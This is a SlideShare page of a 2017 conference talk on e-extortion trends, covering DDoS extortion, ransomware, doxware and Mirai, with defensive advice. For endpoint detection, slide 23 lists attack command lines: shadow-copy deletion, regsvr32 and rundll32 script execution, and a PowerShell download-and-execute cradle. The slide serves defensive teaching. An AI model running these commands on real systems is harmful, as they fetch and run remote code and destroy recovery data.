SlideShare a Scribd company logo

E-Extortion Trends & Defense Strategies

Download as PPTX, PDF
Erik Iker
Erik Iker

This document summarizes an presentation on e-extortion trends and defense. It discusses the evolution of extortion from early distributed denial of service attacks and ransomware to more sophisticated techniques that combine encryption, data exfiltration, and extortion demands. The presentation outlines strategies for defending against these threats, including backups, system hardening, endpoint security solutions, threat intelligence sharing, and following financial trails.

Technology
1 of 34
Erik Iker Sr. Incident Response Analyst B-Sides Tampa 2017 e-Extortion Trends & Defense
Cisco Confidential 2 Whoami • Incident Response Analyst for Cisco Security Advisory Services. Working with customers performing strategic, proactive, and reactive response to information security issues • 3 years – Insider threat analyst then Intrusion Forensics and Hunt Team manager at JPMorgan Chase • 13 years law enforcement performing digital forensics and computer crime investigations
Cisco Confidential 3 Agenda Evolution of extortion and trends Ransomware Defense DDoS & Threat Intel
Cisco Confidential 4 Extortion Defined The practice of obtaining something, especially money, through force or threats
Cisco Confidential 5 Attribution was simpler
Cisco Confidential 6 First forays into e-extortion • 2007 FBI release of warning about online extortion mirroring mafia tactics
Cisco Confidential 7 DDoS “Protection” Racket
Cisco Confidential 8 Armada Collective DHS Warning
Cisco Confidential 9 Lizard Squad Gaming DDoS
Cisco Confidential 10 Cats Catch Some Mice Again • Early 2016 Interpol coordinated arrests of Armada Collective Members in Australia, and DD4BC members in Bosnia and Herzegovinia
Cisco Confidential 11 Copy Cat Profiteering
Cisco Confidential 12 Ransom Extends Extortion • Ransom: Payment demanded for the release of a captured person or property
Cisco Confidential 13 Data Breach Response Phishing • Scammers leveraged breaches of adult-themed websites to scare victims into ransom payments
Cisco Confidential 14 Data Breached for Ransom
Cisco Confidential 15 Ransomware Scams That Can’t Decrypt http://www.welivesecurity.com/2017/01/05/killdisk- now-targeting-linux-demands-250k-ransom-cant- decrypt/ http://blog.talosintel.com/2016/07/ranscam.html
Cisco Confidential 16 Ransom Hits Home • Publicly accessible NoSQL, Elasticsearch, Hadoop, Redis being deleted with ransom note left. • Completely unable to be recovered, EVEN IF YOU PAY
Cisco Confidential 17 The Gift That Keeps Giving • In January, Cisco Talos researchers found new variants of Locky also deliver Kovter click fraud Trojan • http://blog.talosintel.com/2017/01/locky-struggles.html
Cisco Confidential 18 E-Extortion Trifecta • Doxware brings all the extortion tactics into one, and is becoming more mainstream: • Encryption • Exfiltration • Extortion demands • Public Data Leak
Cisco Confidential 19 What We Know So Far • History Repeats itself with the cat-and-mouse game, and innovation of the mice – We have to be ready for the next evolution of threats • Getting to know your enemy can keep you from paying out to imposters – We need to gain intelligence about our threats • Even if you pay your enemy, what keeps them from coming back again and again wanting more handouts? – Let’s be prepared to defend ourselves and maintain business continuity plans
Cisco Confidential 20 Ransom? • “Without a hostage, there is no ransom. That’s what a ransom is.” - The rules according to Walter Sobchak
Cisco Confidential 21 Backups – Offline if Possible • CryptoFortress – encrypting unmapped shares • SamSam – Criminal group obtaining foothold through LFI, conducting surveillance, then encrypting everything including backup servers
Cisco Confidential 22 System Hardening • Over 90% of PowerShell scripts analyzed by Symantec were malicious in 2016. If endpoints don’t need PS, remove it • If you can’t remove PS, disable ISE and REPL ability • Application whitelisting • Change default network options for NoSQL • bind 127.0.0.1 instead of 0.0.0.0 • Change default ports to custom config to stifle script kiddies • https://www.elastic.co/blog/protecting-against-attacks-that-hold-your-data-for- ransom • Restrict IP ranges that can access your NoSQL Instance • Implement security group for cloud instances • http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-network-security.html
Cisco Confidential 23 Endpoint Solutions • Able to review for heuristic patterns of binaries being called, and review command line parameters such as: • “Vssadmin.exe delete shadows /all /quiet del /f /q %0” • “rundll32.exe C:Users$usernameAppDataLocalTemp” • “rundll32.exe javascript:”mshtml,RunHTMLApplication<script execution stuff>.RegRead(”HKCU<specific registry path>”) “ will interpret in the command line as “rundll.exe mshtml.dll, $hexadecimal for entry point in memory” • “regsvr32.exe /s /u /i:< ^((http[s]?|ftp):/)?/?([^:/s]+)((/w+)*/)([w- .]+[^#?s]+)(.*)?(#[w-]+)?$ > scrobj.dll • “Powershell -nop -c "iex(New-Object Net.WebClient).DownloadString : “^((http[s]?|ftp):/)?/?([^:/s]+)((/w+)*/)([w-.]+[^#?s]+)(.*)?(#[w-]+)?$ ’)" • “Maliciousbinary.exe %windir%system32....%smstc.exe”
Cisco Confidential 24 Ransomware Decryptors • https://www.nomoreransom.org/ • http://www.talosintelligence.com/teslacrypt_tool/
Cisco Confidential 25 What About Things That Aren’t Ransomware? neeson_speech1
Cisco Confidential 26 One DDoS Does Not Fit All • Volume Based Attacks – Goal is to overload bandwidth – UDP flood, ICMP floods (Bits per second) • Protocol Attacks – goal is to overload router, firewall, and GLB – fragmented packets, Smurf Attack (spoof victim IP for requests reflected at victim) (Packets per second) • Application Attacks – goal is to overload the resources of the web server – flood of GET or POST requests – Slowloris - creating connections with only partial requests to leave connection open (requests per second)
Cisco Confidential 27 Mirai • Internet of Terribly Secured Things opened the door to the most geographically dispersed botnets for DDoS • Mirai takes over device and shuts off Telnet, SSH, and HTTP ports so remote access isn’t possible for remediation • Baby Monitors and CCTV cameras responsible for high profile attacks • Using dictionary of ~60 weak passwords (less than the Morris
Cisco Confidential 28 DDoSaaS
Cisco Confidential 29 DDoS Game Plan • Be able to detect DDoS before network is inaccessible, or systems are crashing using NetFlow, system resource, and Firewall traffic monitoring dashboards • Have a plan for blocking, dropping, scrubbing, rate limiting traffic using local appliances or a vendor relationship • Do not rely solely on an agreement with ISP as your plan for DDoS mitigation
Cisco Confidential 30 Start with Google
Cisco Confidential 31 Follow the Money
Cisco Confidential 32 Intel Feeds and Community Membership • ISACs o msisac.cisecurity.org o fsisac.com o r-cisc.org • Malware sharing - www.misp-project.org • MITRE Threat Intel Project - https://crits.github.io/ • Tons of paid vendor feeds
Cisco Confidential 33 Use Your Phishing Quarantine Data
Cisco Confidential 34 Thanks • Twitter - @ErikIkerFW • LinkedIn - www.linkedin.com/in/erikiker

Recommended

Fidelis - Live Demonstration of Deception Solution
Fidelis - Live Demonstration of Deception SolutionFidelis - Live Demonstration of Deception Solution
Fidelis - Live Demonstration of Deception SolutionFidelis Cybersecurity
 
Capture the Flag Exercise Using Active Deception Defense
Capture the Flag Exercise Using Active Deception DefenseCapture the Flag Exercise Using Active Deception Defense
Capture the Flag Exercise Using Active Deception DefenseFidelis Cybersecurity
 
Shamoon
ShamoonShamoon
ShamoonShakacon
 
"Giving the bad guys no sleep"
"Giving the bad guys no sleep""Giving the bad guys no sleep"
"Giving the bad guys no sleep"Christiaan Beek
 
Become a Threat Hunter by Hamza Beghal
Become a Threat Hunter by Hamza BeghalBecome a Threat Hunter by Hamza Beghal
Become a Threat Hunter by Hamza BeghalNull Singapore
 
Offensive malware usage and defense
Offensive malware usage and defenseOffensive malware usage and defense
Offensive malware usage and defenseChristiaan Beek
 
Hunting and Legal Hackback using Cyber Deception
Hunting and Legal Hackback using Cyber DeceptionHunting and Legal Hackback using Cyber Deception
Hunting and Legal Hackback using Cyber DeceptionCymmetria
 
Webinar: Hunting maturity through cyber deception
Webinar: Hunting maturity through cyber deception Webinar: Hunting maturity through cyber deception
Webinar: Hunting maturity through cyber deception Cymmetria
 

Recommended

Fidelis - Live Demonstration of Deception Solution
Fidelis - Live Demonstration of Deception SolutionFidelis - Live Demonstration of Deception Solution
Fidelis - Live Demonstration of Deception SolutionFidelis Cybersecurity
 
Capture the Flag Exercise Using Active Deception Defense
Capture the Flag Exercise Using Active Deception DefenseCapture the Flag Exercise Using Active Deception Defense
Capture the Flag Exercise Using Active Deception DefenseFidelis Cybersecurity
 
Shamoon
ShamoonShamoon
ShamoonShakacon
 
"Giving the bad guys no sleep"
"Giving the bad guys no sleep""Giving the bad guys no sleep"
"Giving the bad guys no sleep"Christiaan Beek
 
Become a Threat Hunter by Hamza Beghal
Become a Threat Hunter by Hamza BeghalBecome a Threat Hunter by Hamza Beghal
Become a Threat Hunter by Hamza BeghalNull Singapore
 
Offensive malware usage and defense
Offensive malware usage and defenseOffensive malware usage and defense
Offensive malware usage and defenseChristiaan Beek
 
Hunting and Legal Hackback using Cyber Deception
Hunting and Legal Hackback using Cyber DeceptionHunting and Legal Hackback using Cyber Deception
Hunting and Legal Hackback using Cyber DeceptionCymmetria
 
Webinar: Hunting maturity through cyber deception
Webinar: Hunting maturity through cyber deception Webinar: Hunting maturity through cyber deception
Webinar: Hunting maturity through cyber deception Cymmetria
 
"There's a pot of Bitcoins behind the ransomware rainbow"
"There's a pot of Bitcoins behind the ransomware rainbow""There's a pot of Bitcoins behind the ransomware rainbow"
"There's a pot of Bitcoins behind the ransomware rainbow"Christiaan Beek
 
CSF18 - Incident Response in the Cloud - Yuri Diogenes
CSF18 - Incident Response in the Cloud - Yuri DiogenesCSF18 - Incident Response in the Cloud - Yuri Diogenes
CSF18 - Incident Response in the Cloud - Yuri DiogenesNCCOMMS
 
Atelier Technique CISCO ACSS 2018
Atelier Technique CISCO ACSS 2018Atelier Technique CISCO ACSS 2018
Atelier Technique CISCO ACSS 2018African Cyber Security Summit
 
CSF18 - Guarding Against the Unknown - Rafael Narezzi
CSF18 - Guarding Against the Unknown - Rafael NarezziCSF18 - Guarding Against the Unknown - Rafael Narezzi
CSF18 - Guarding Against the Unknown - Rafael NarezziNCCOMMS
 
Breaking the cyber kill chain!
Breaking the cyber kill chain!Breaking the cyber kill chain!
Breaking the cyber kill chain!Nahidul Kibria
 
Adaptive Defense - Understanding Cyber Attacks
Adaptive Defense - Understanding Cyber AttacksAdaptive Defense - Understanding Cyber Attacks
Adaptive Defense - Understanding Cyber AttacksJermund Ottermo
 
The 4horsemen of ics secapocalypse
The 4horsemen of ics secapocalypseThe 4horsemen of ics secapocalypse
The 4horsemen of ics secapocalypseChristiaan Beek
 
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...PROIDEA
 
WannaCry ransomware outbreak - what you need to know
WannaCry ransomware outbreak - what you need to knowWannaCry ransomware outbreak - what you need to know
WannaCry ransomware outbreak - what you need to knowSymantec Security Response
 
Atelier Technique ARBOR NETWORKS ACSS 2018
Atelier Technique ARBOR NETWORKS ACSS 2018Atelier Technique ARBOR NETWORKS ACSS 2018
Atelier Technique ARBOR NETWORKS ACSS 2018African Cyber Security Summit
 
Honey, I Stole Your C2 Server: A Dive into Attacker Infrastructure
Honey, I Stole Your C2 Server: A Dive into Attacker InfrastructureHoney, I Stole Your C2 Server: A Dive into Attacker Infrastructure
Honey, I Stole Your C2 Server: A Dive into Attacker InfrastructureShakacon
 
Behavior-Based Defense in ICS
Behavior-Based Defense in ICSBehavior-Based Defense in ICS
Behavior-Based Defense in ICSDragos, Inc.
 
How to protect your business from Wannacry Ransomware
How to protect your business from Wannacry RansomwareHow to protect your business from Wannacry Ransomware
How to protect your business from Wannacry RansomwareKaspersky
 
Cymmetria Webinar: Deception & Responder
Cymmetria Webinar: Deception & ResponderCymmetria Webinar: Deception & Responder
Cymmetria Webinar: Deception & ResponderCymmetria
 
Wannacry | Technical Insight and Lessons Learned
Wannacry | Technical Insight and Lessons LearnedWannacry | Technical Insight and Lessons Learned
Wannacry | Technical Insight and Lessons LearnedThomas Roccia
 
Advantage Technology - Ransomware and the NIST Cybersecurity Framework
Advantage Technology - Ransomware and the NIST Cybersecurity FrameworkAdvantage Technology - Ransomware and the NIST Cybersecurity Framework
Advantage Technology - Ransomware and the NIST Cybersecurity FrameworkJack Shaffer
 
CSF18 - The Digital Threat of the Decade (Century) - Sasha Kranjac
CSF18 - The Digital Threat of the Decade (Century) - Sasha KranjacCSF18 - The Digital Threat of the Decade (Century) - Sasha Kranjac
CSF18 - The Digital Threat of the Decade (Century) - Sasha KranjacNCCOMMS
 
Ransomware 2017: New threats emerge
Ransomware 2017: New threats emergeRansomware 2017: New threats emerge
Ransomware 2017: New threats emergeSymantec Security Response
 
Webinar: Stopping evasive malware - how a cloud sandbox array works
Webinar: Stopping evasive malware - how a cloud sandbox array worksWebinar: Stopping evasive malware - how a cloud sandbox array works
Webinar: Stopping evasive malware - how a cloud sandbox array worksCyren, Inc
 
Defending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael BanksDefending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael BanksEC-Council
 
Watering hole attacks case study analysis
Watering hole attacks case study analysisWatering hole attacks case study analysis
Watering hole attacks case study analysisCysinfo Cyber Security Community
 
Failing at Scale - PNWPHP 2016
Failing at Scale - PNWPHP 2016Failing at Scale - PNWPHP 2016
Failing at Scale - PNWPHP 2016Chris Tankersley
 

More Related Content

What's hot

"There's a pot of Bitcoins behind the ransomware rainbow"
"There's a pot of Bitcoins behind the ransomware rainbow""There's a pot of Bitcoins behind the ransomware rainbow"
"There's a pot of Bitcoins behind the ransomware rainbow"Christiaan Beek
 
CSF18 - Incident Response in the Cloud - Yuri Diogenes
CSF18 - Incident Response in the Cloud - Yuri DiogenesCSF18 - Incident Response in the Cloud - Yuri Diogenes
CSF18 - Incident Response in the Cloud - Yuri DiogenesNCCOMMS
 
CSF18 - Guarding Against the Unknown - Rafael Narezzi
CSF18 - Guarding Against the Unknown - Rafael NarezziCSF18 - Guarding Against the Unknown - Rafael Narezzi
CSF18 - Guarding Against the Unknown - Rafael NarezziNCCOMMS
 
Breaking the cyber kill chain!
Breaking the cyber kill chain!Breaking the cyber kill chain!
Breaking the cyber kill chain!Nahidul Kibria
 
Adaptive Defense - Understanding Cyber Attacks
Adaptive Defense - Understanding Cyber AttacksAdaptive Defense - Understanding Cyber Attacks
Adaptive Defense - Understanding Cyber AttacksJermund Ottermo
 
The 4horsemen of ics secapocalypse
The 4horsemen of ics secapocalypseThe 4horsemen of ics secapocalypse
The 4horsemen of ics secapocalypseChristiaan Beek
 
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...PROIDEA
 
WannaCry ransomware outbreak - what you need to know
WannaCry ransomware outbreak - what you need to knowWannaCry ransomware outbreak - what you need to know
WannaCry ransomware outbreak - what you need to knowSymantec Security Response
 
Honey, I Stole Your C2 Server: A Dive into Attacker Infrastructure
Honey, I Stole Your C2 Server: A Dive into Attacker InfrastructureHoney, I Stole Your C2 Server: A Dive into Attacker Infrastructure
Honey, I Stole Your C2 Server: A Dive into Attacker InfrastructureShakacon
 
Behavior-Based Defense in ICS
Behavior-Based Defense in ICSBehavior-Based Defense in ICS
Behavior-Based Defense in ICSDragos, Inc.
 
How to protect your business from Wannacry Ransomware
How to protect your business from Wannacry RansomwareHow to protect your business from Wannacry Ransomware
How to protect your business from Wannacry RansomwareKaspersky
 
Cymmetria Webinar: Deception & Responder
Cymmetria Webinar: Deception & ResponderCymmetria Webinar: Deception & Responder
Cymmetria Webinar: Deception & ResponderCymmetria
 
Wannacry | Technical Insight and Lessons Learned
Wannacry | Technical Insight and Lessons LearnedWannacry | Technical Insight and Lessons Learned
Wannacry | Technical Insight and Lessons LearnedThomas Roccia
 
Advantage Technology - Ransomware and the NIST Cybersecurity Framework
Advantage Technology - Ransomware and the NIST Cybersecurity FrameworkAdvantage Technology - Ransomware and the NIST Cybersecurity Framework
Advantage Technology - Ransomware and the NIST Cybersecurity FrameworkJack Shaffer
 
CSF18 - The Digital Threat of the Decade (Century) - Sasha Kranjac
CSF18 - The Digital Threat of the Decade (Century) - Sasha KranjacCSF18 - The Digital Threat of the Decade (Century) - Sasha Kranjac
CSF18 - The Digital Threat of the Decade (Century) - Sasha KranjacNCCOMMS
 
Webinar: Stopping evasive malware - how a cloud sandbox array works
Webinar: Stopping evasive malware - how a cloud sandbox array worksWebinar: Stopping evasive malware - how a cloud sandbox array works
Webinar: Stopping evasive malware - how a cloud sandbox array worksCyren, Inc
 
Defending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael BanksDefending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael BanksEC-Council
 

What's hot (20)

"There's a pot of Bitcoins behind the ransomware rainbow"
"There's a pot of Bitcoins behind the ransomware rainbow""There's a pot of Bitcoins behind the ransomware rainbow"
"There's a pot of Bitcoins behind the ransomware rainbow"
 
CSF18 - Incident Response in the Cloud - Yuri Diogenes
CSF18 - Incident Response in the Cloud - Yuri DiogenesCSF18 - Incident Response in the Cloud - Yuri Diogenes
CSF18 - Incident Response in the Cloud - Yuri Diogenes
 
Atelier Technique CISCO ACSS 2018
Atelier Technique CISCO ACSS 2018Atelier Technique CISCO ACSS 2018
Atelier Technique CISCO ACSS 2018
 
CSF18 - Guarding Against the Unknown - Rafael Narezzi
CSF18 - Guarding Against the Unknown - Rafael NarezziCSF18 - Guarding Against the Unknown - Rafael Narezzi
CSF18 - Guarding Against the Unknown - Rafael Narezzi
 
Breaking the cyber kill chain!
Breaking the cyber kill chain!Breaking the cyber kill chain!
Breaking the cyber kill chain!
 
Adaptive Defense - Understanding Cyber Attacks
Adaptive Defense - Understanding Cyber AttacksAdaptive Defense - Understanding Cyber Attacks
Adaptive Defense - Understanding Cyber Attacks
 
The 4horsemen of ics secapocalypse
The 4horsemen of ics secapocalypseThe 4horsemen of ics secapocalypse
The 4horsemen of ics secapocalypse
 
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
Inside Cybercrime Groups Harvesting Active Directory for Fun and Profit - Vit...
 
WannaCry ransomware outbreak - what you need to know
WannaCry ransomware outbreak - what you need to knowWannaCry ransomware outbreak - what you need to know
WannaCry ransomware outbreak - what you need to know
 
Atelier Technique ARBOR NETWORKS ACSS 2018
Atelier Technique ARBOR NETWORKS ACSS 2018Atelier Technique ARBOR NETWORKS ACSS 2018
Atelier Technique ARBOR NETWORKS ACSS 2018
 
Honey, I Stole Your C2 Server: A Dive into Attacker Infrastructure
Honey, I Stole Your C2 Server: A Dive into Attacker InfrastructureHoney, I Stole Your C2 Server: A Dive into Attacker Infrastructure
Honey, I Stole Your C2 Server: A Dive into Attacker Infrastructure
 
Behavior-Based Defense in ICS
Behavior-Based Defense in ICSBehavior-Based Defense in ICS
Behavior-Based Defense in ICS
 
How to protect your business from Wannacry Ransomware
How to protect your business from Wannacry RansomwareHow to protect your business from Wannacry Ransomware
How to protect your business from Wannacry Ransomware
 
Cymmetria Webinar: Deception & Responder
Cymmetria Webinar: Deception & ResponderCymmetria Webinar: Deception & Responder
Cymmetria Webinar: Deception & Responder
 
Wannacry | Technical Insight and Lessons Learned
Wannacry | Technical Insight and Lessons LearnedWannacry | Technical Insight and Lessons Learned
Wannacry | Technical Insight and Lessons Learned
 
Advantage Technology - Ransomware and the NIST Cybersecurity Framework
Advantage Technology - Ransomware and the NIST Cybersecurity FrameworkAdvantage Technology - Ransomware and the NIST Cybersecurity Framework
Advantage Technology - Ransomware and the NIST Cybersecurity Framework
 
CSF18 - The Digital Threat of the Decade (Century) - Sasha Kranjac
CSF18 - The Digital Threat of the Decade (Century) - Sasha KranjacCSF18 - The Digital Threat of the Decade (Century) - Sasha Kranjac
CSF18 - The Digital Threat of the Decade (Century) - Sasha Kranjac
 
Ransomware 2017: New threats emerge
Ransomware 2017: New threats emergeRansomware 2017: New threats emerge
Ransomware 2017: New threats emerge
 
Webinar: Stopping evasive malware - how a cloud sandbox array works
Webinar: Stopping evasive malware - how a cloud sandbox array worksWebinar: Stopping evasive malware - how a cloud sandbox array works
Webinar: Stopping evasive malware - how a cloud sandbox array works
 
Defending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael BanksDefending Against 1,000,000 Cyber Attacks by Michael Banks
Defending Against 1,000,000 Cyber Attacks by Michael Banks
 

Viewers also liked

Failing at Scale - PNWPHP 2016
Failing at Scale - PNWPHP 2016Failing at Scale - PNWPHP 2016
Failing at Scale - PNWPHP 2016Chris Tankersley
 
How to build a Distributed Serverless Polyglot Microservices IoT Platform us...
How to build a Distributed Serverless Polyglot Microservices IoT Platform us...How to build a Distributed Serverless Polyglot Microservices IoT Platform us...
How to build a Distributed Serverless Polyglot Microservices IoT Platform us...Animesh Singh
 
How to: node js & micro-services
How to: node js & micro-servicesHow to: node js & micro-services
How to: node js & micro-servicesMichael Haberman
 
Nuvola: a tale of migration to AWS
Nuvola: a tale of migration to AWSNuvola: a tale of migration to AWS
Nuvola: a tale of migration to AWSMatteo Moretti
 
Teaching for Peace, Renewing the Spirit - TESOL 2014
Teaching for Peace, Renewing the Spirit - TESOL 2014Teaching for Peace, Renewing the Spirit - TESOL 2014
Teaching for Peace, Renewing the Spirit - TESOL 2014Cheryl Woelk
 
Serverless Logging with AWS Lambda and the Elastic Stack
Serverless Logging with AWS Lambda and the Elastic StackServerless Logging with AWS Lambda and the Elastic Stack
Serverless Logging with AWS Lambda and the Elastic StackEdoardo Paolo Scalafiotti
 
Urban Legends: What You Code Makes You Who You Are - PJ Hagerty - Codemotion ...
Urban Legends: What You Code Makes You Who You Are - PJ Hagerty - Codemotion ...Urban Legends: What You Code Makes You Who You Are - PJ Hagerty - Codemotion ...
Urban Legends: What You Code Makes You Who You Are - PJ Hagerty - Codemotion ...Codemotion
 
Java Garbage Collectors – Moving to Java7 Garbage First (G1) Collector
Java Garbage Collectors – Moving to Java7 Garbage First (G1) CollectorJava Garbage Collectors – Moving to Java7 Garbage First (G1) Collector
Java Garbage Collectors – Moving to Java7 Garbage First (G1) CollectorGurpreet Sachdeva
 
AppSphere 15 - Containers and Microservices Create New Performance Challenges
AppSphere 15 - Containers and Microservices Create New Performance ChallengesAppSphere 15 - Containers and Microservices Create New Performance Challenges
AppSphere 15 - Containers and Microservices Create New Performance ChallengesAppDynamics
 
LJC Mashup "Building Java Microservices for the Cloud && Chuck Norris Doesn't...
LJC Mashup "Building Java Microservices for the Cloud && Chuck Norris Doesn't...LJC Mashup "Building Java Microservices for the Cloud && Chuck Norris Doesn't...
LJC Mashup "Building Java Microservices for the Cloud && Chuck Norris Doesn't...Daniel Bryant
 
Regex Considered Harmful: Use Rosie Pattern Language Instead
Regex Considered Harmful: Use Rosie Pattern Language InsteadRegex Considered Harmful: Use Rosie Pattern Language Instead
Regex Considered Harmful: Use Rosie Pattern Language InsteadAll Things Open
 
Een Gezond Gebit2
Een Gezond Gebit2Een Gezond Gebit2
Een Gezond Gebit2guest031320
 
AtlasCamp 2015: How HipChat ships at the speed of awesome
AtlasCamp 2015: How HipChat ships at the speed of awesomeAtlasCamp 2015: How HipChat ships at the speed of awesome
AtlasCamp 2015: How HipChat ships at the speed of awesomeAtlassian
 
How Docker EE is Finnish Railway’s Ticket to App Modernization
How Docker EE is Finnish Railway’s Ticket to App ModernizationHow Docker EE is Finnish Railway’s Ticket to App Modernization
How Docker EE is Finnish Railway’s Ticket to App ModernizationDocker, Inc.
 
Cloud Foundry Logging and Metrics
Cloud Foundry Logging and MetricsCloud Foundry Logging and Metrics
Cloud Foundry Logging and MetricsEd King
 

Viewers also liked (20)

Watering hole attacks case study analysis
Watering hole attacks case study analysisWatering hole attacks case study analysis
Watering hole attacks case study analysis
 
Failing at Scale - PNWPHP 2016
Failing at Scale - PNWPHP 2016Failing at Scale - PNWPHP 2016
Failing at Scale - PNWPHP 2016
 
Business quiz
Business quizBusiness quiz
Business quiz
 
Plumbing tips
Plumbing tipsPlumbing tips
Plumbing tips
 
How to build a Distributed Serverless Polyglot Microservices IoT Platform us...
How to build a Distributed Serverless Polyglot Microservices IoT Platform us...How to build a Distributed Serverless Polyglot Microservices IoT Platform us...
How to build a Distributed Serverless Polyglot Microservices IoT Platform us...
 
How to: node js & micro-services
How to: node js & micro-servicesHow to: node js & micro-services
How to: node js & micro-services
 
Nuvola: a tale of migration to AWS
Nuvola: a tale of migration to AWSNuvola: a tale of migration to AWS
Nuvola: a tale of migration to AWS
 
Teaching for Peace, Renewing the Spirit - TESOL 2014
Teaching for Peace, Renewing the Spirit - TESOL 2014Teaching for Peace, Renewing the Spirit - TESOL 2014
Teaching for Peace, Renewing the Spirit - TESOL 2014
 
Serverless Logging with AWS Lambda and the Elastic Stack
Serverless Logging with AWS Lambda and the Elastic StackServerless Logging with AWS Lambda and the Elastic Stack
Serverless Logging with AWS Lambda and the Elastic Stack
 
Urban Legends: What You Code Makes You Who You Are - PJ Hagerty - Codemotion ...
Urban Legends: What You Code Makes You Who You Are - PJ Hagerty - Codemotion ...Urban Legends: What You Code Makes You Who You Are - PJ Hagerty - Codemotion ...
Urban Legends: What You Code Makes You Who You Are - PJ Hagerty - Codemotion ...
 
Java Garbage Collectors – Moving to Java7 Garbage First (G1) Collector
Java Garbage Collectors – Moving to Java7 Garbage First (G1) CollectorJava Garbage Collectors – Moving to Java7 Garbage First (G1) Collector
Java Garbage Collectors – Moving to Java7 Garbage First (G1) Collector
 
EVOLVE'16 | Enhance | Anil Kalbag & Anshul Chhabra | Comparative Architecture...
EVOLVE'16 | Enhance | Anil Kalbag & Anshul Chhabra | Comparative Architecture...EVOLVE'16 | Enhance | Anil Kalbag & Anshul Chhabra | Comparative Architecture...
EVOLVE'16 | Enhance | Anil Kalbag & Anshul Chhabra | Comparative Architecture...
 
Incident Response in the wake of Dear CEO
Incident Response in the wake of Dear CEOIncident Response in the wake of Dear CEO
Incident Response in the wake of Dear CEO
 
AppSphere 15 - Containers and Microservices Create New Performance Challenges
AppSphere 15 - Containers and Microservices Create New Performance ChallengesAppSphere 15 - Containers and Microservices Create New Performance Challenges
AppSphere 15 - Containers and Microservices Create New Performance Challenges
 
LJC Mashup "Building Java Microservices for the Cloud && Chuck Norris Doesn't...
LJC Mashup "Building Java Microservices for the Cloud && Chuck Norris Doesn't...LJC Mashup "Building Java Microservices for the Cloud && Chuck Norris Doesn't...
LJC Mashup "Building Java Microservices for the Cloud && Chuck Norris Doesn't...
 
Regex Considered Harmful: Use Rosie Pattern Language Instead
Regex Considered Harmful: Use Rosie Pattern Language InsteadRegex Considered Harmful: Use Rosie Pattern Language Instead
Regex Considered Harmful: Use Rosie Pattern Language Instead
 
Een Gezond Gebit2
Een Gezond Gebit2Een Gezond Gebit2
Een Gezond Gebit2
 
AtlasCamp 2015: How HipChat ships at the speed of awesome
AtlasCamp 2015: How HipChat ships at the speed of awesomeAtlasCamp 2015: How HipChat ships at the speed of awesome
AtlasCamp 2015: How HipChat ships at the speed of awesome
 
How Docker EE is Finnish Railway’s Ticket to App Modernization
How Docker EE is Finnish Railway’s Ticket to App ModernizationHow Docker EE is Finnish Railway’s Ticket to App Modernization
How Docker EE is Finnish Railway’s Ticket to App Modernization
 
Cloud Foundry Logging and Metrics
Cloud Foundry Logging and MetricsCloud Foundry Logging and Metrics
Cloud Foundry Logging and Metrics
 

Similar to E-Extortion Trends & Defense Strategies

LIFT OFF 2017: Ransomware and IR Overview
LIFT OFF 2017: Ransomware and IR OverviewLIFT OFF 2017: Ransomware and IR Overview
LIFT OFF 2017: Ransomware and IR OverviewRobert Herjavec
 
Cisco Connect Toronto 2017 - Security Through The Eyes of a Hacker
Cisco Connect Toronto 2017 - Security Through The Eyes of a HackerCisco Connect Toronto 2017 - Security Through The Eyes of a Hacker
Cisco Connect Toronto 2017 - Security Through The Eyes of a HackerCisco Canada
 
Introduction to Software Security and Best Practices
Introduction to Software Security and Best PracticesIntroduction to Software Security and Best Practices
Introduction to Software Security and Best PracticesMaxime ALAY-EDDINE
 
Protecting Financial Networks from Cyber Crime
Protecting Financial Networks from Cyber CrimeProtecting Financial Networks from Cyber Crime
Protecting Financial Networks from Cyber CrimeLancope, Inc.
 
SplunkLive! Stockholm 2015 breakout - Analytics based security
SplunkLive! Stockholm 2015 breakout - Analytics based securitySplunkLive! Stockholm 2015 breakout - Analytics based security
SplunkLive! Stockholm 2015 breakout - Analytics based securitySplunk
 
Setting up CSIRT
Setting up CSIRTSetting up CSIRT
Setting up CSIRTAPNIC
 
Fundamentals of Network security
Fundamentals of Network securityFundamentals of Network security
Fundamentals of Network securityAPNIC
 
Cyber Security 101 - Back to Basics (HP Secure Print Event 2018)
Cyber Security 101 - Back to Basics (HP Secure Print Event 2018)Cyber Security 101 - Back to Basics (HP Secure Print Event 2018)
Cyber Security 101 - Back to Basics (HP Secure Print Event 2018)Shah Sheikh
 
Compliance made easy. Pass your audits stress-free.
Compliance made easy. Pass your audits stress-free.Compliance made easy. Pass your audits stress-free.
Compliance made easy. Pass your audits stress-free.AlgoSec
 
Discover advanced threats with threat intelligence - Jeremy Li
Discover advanced threats with threat intelligence - Jeremy LiDiscover advanced threats with threat intelligence - Jeremy Li
Discover advanced threats with threat intelligence - Jeremy LiJeremy Li
 
Disruptionware-TRustedCISO103020v0.7.pptx
Disruptionware-TRustedCISO103020v0.7.pptxDisruptionware-TRustedCISO103020v0.7.pptx
Disruptionware-TRustedCISO103020v0.7.pptxDebra Baker, CISSP CSSP
 
SplunkLive! Amsterdam 2015 - Analytics based security breakout
SplunkLive! Amsterdam 2015 - Analytics based security breakoutSplunkLive! Amsterdam 2015 - Analytics based security breakout
SplunkLive! Amsterdam 2015 - Analytics based security breakoutSplunk
 
IntroCyberv2.1_Chp2_Instructor_Supplemental_Material.pptx
